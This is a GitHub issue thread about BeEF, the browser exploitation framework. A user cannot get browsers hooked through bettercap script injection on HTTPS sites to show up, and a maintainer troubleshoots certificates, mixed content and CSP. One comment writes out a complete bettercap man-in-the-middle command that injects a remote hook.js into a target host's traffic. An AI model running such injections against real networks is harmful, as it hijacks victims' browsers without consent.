### ISSUE TITLE
On ssl websites hook is injected but browser does not appear in "online browsers"

### ISSUE THREAD

**Issue by miltosc** [beefproject/beef#1471]
Verify first that your issue/request has not been posted previously:

* https://github.com/beefproject/beef/issues
* https://github.com/beefproject/beef/wiki/FAQ

Ensure you're using the [latest version of BeEF](https://github.com/beefproject/beef/releases/tag/beef-0.4.7.0).

#### Environment

What version/revision of BeEF are you using?
beef-xss from kali rolling

On what version of Ruby?
ruby 2.3.3p222 (2016-11-21) [x86_64-linux-gnu]

On what browser?
Chrome

On what operating system?
Android

#### Configuration

Are you using a non-default configuration?
No

Have you enabled or disabled any BeEF extensions?
no

#### Summary

Please provide a summary of the issue.

#### Expected Behaviour

What was the expected result?
Every website when hook.js is injected, browser should appear in "online browsers"

#### Actual Behaviour

What was the actual result?
On ssl websites hook.js is injected but browser does not appear in "online browsers"

#### Steps to Reproduce

Please provide steps to reproduce this issue.
i inject hook.js using bettercap

#### Additional Information

Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screen shots.

**Comment by bcoles** [comment]
Is BeEF configured with HTTPS / SSL enabled? Are you using the `https` scheme for the hook URL ?

Modern browsers will not include [mixed content](https://developers.google.com/web/fundamentals/security/prevent-mixed-content/what-is-mixed-content) hosted on a HTTP origin from a HTTPS origin.

Is BeEF configured with a valid SSL certificate?

If you're using an untrusted certificate, such as the default self-signed certificate included with Beef, then the browser may not load the hook script resource as it cannot establish a trusted SSL / TLS connection to BeEF.

**Comment by miltosc** [comment]
Hello, thank you for your quick reply.
I did exactly what you said.
BeEf with valid certificate (not self-signed)
the hook url is https with valid ssl cetificate (same as BeEF)

The problem persists.
Still it injects the js code but the browser is not shown at BeEf's "online browsers"

please advise .

**Comment by miltosc** [comment]
How the Beef front end detects the hooked browsers? There is a callback in .js? which address it calls? Thanks

**Comment by bcoles** [comment]
I see in your issue description that you're hooking via Bettercap. There was a bug in the Betterap + BeEF integration a while ago which has since been fixed.

There's a number of things which could be going on here. For instance, the domain in which the hook is injected could make use of CSP.

Have you tested hooking the browser directly via the demo page?

**Comment by bcoles** [comment]
BeEF detects the browser using client-side code in the [browser directory](https://github.com/beefproject/beef/tree/master/core/main/client), specifically [browser.js](https://github.com/beefproject/beef/blob/master/core/main/client/browser.js)

You should see output printed to the BeEF console when a new browser is hooked.

**Comment by miltosc** [comment]
unfortunately i am in front of a dead end here. 
Console with "online" command returns empty results
I noticed that it shows online only the demo page both console and UI.

**Comment by miltosc** [comment]
The beef console has a command "online" and it shows hooked browsers. In my case it returns nothing. I mean the console does not see the hooked browser. The UI also does not see any hooked browsers. I noticed that the only browsers beef sees are those running the basic demo page.

**Comment by bcoles** [comment]
The console extension is deprecated. Disable it. Do not use it. It breaks BeEF.

In fact, the fact that BeEF even started with the console extension enabled indicates that the version of BeEF you're using is old. Old versions of BeEF have a comment in the config warning not to enable the console extension. Newer versions outright warn you in the BeEF console output that the console extension should not be used.

**Comment by miltosc** [comment]
Ok i installed the latest beef. I run it with no console at all enabled. The same thing happens (only the basic demo page is shown as hooked browser.)

**Comment by bcoles** [comment]
I've verified that BeEF can hook arbitrary HTTPS origins, not just the BeEF demo page.

At a guess, bettercap is intercepting the connection to the BeEF server. Perhaps it's stripping HTTPS?

Can you confirm that you can hook on HTTPS origins, other than the demo page, using a traditional hook rather than injecting the hook with bettercap.

**Comment by miltosc** [comment]
What do you mean "traditional hook" ? If i create a webpage and call hook.js in there it works. When bettercap injects hook.js in view source the correct code is injected but it does not shown as "online browser" The bettercap command that i use is the following (i disabled sslstrip). bettercap -T 192.168.1.2 --proxy-module injectjs --js-url "https://example.com:3000/hook.js" -X --proxy-https --no-sslstrip am i doing something wrong? Injecting using MITMF does not work with ssl it stucks the network.

**Comment by bcoles** [comment]
It looks like what you're doing is correct.

Seems this is more likely an issue with Bettercap, or the hooked domain on which you're injecting BeEF, rather than an issue with BeEF.

I was able to get Bettercap and BeEF working together easily, so I'm not sure what the issue is here.

```
[20:43:12][*] New Hooked Browser [id:1, ip:10.1.1.121, browser:C-49, os:Windows-XP], hooked domain [example.com:443]
```

![bettercap](https://user-images.githubusercontent.com/434827/33464329-cf25812a-d695-11e7-9cbd-a8eac45ec57e.png)

![beef](https://user-images.githubusercontent.com/434827/33464330-d44e8b1a-d695-11e7-88f1-40bbb7a5034d.png)


![chrome](https://user-images.githubusercontent.com/434827/33464234-64f41d7a-d695-11e7-86a4-04c167e12c34.png)

**Comment by ShraddhaShetty01** [comment]
Hi, from the above "bettercap" screenshot , i'm getting as "flag provided but not defined :  -proxy-module

what can i do for this ?

i'm getting the new hooked browser but it is displaying same ip address of Kali linux system. it is not displaying the windows 7 system ip address.
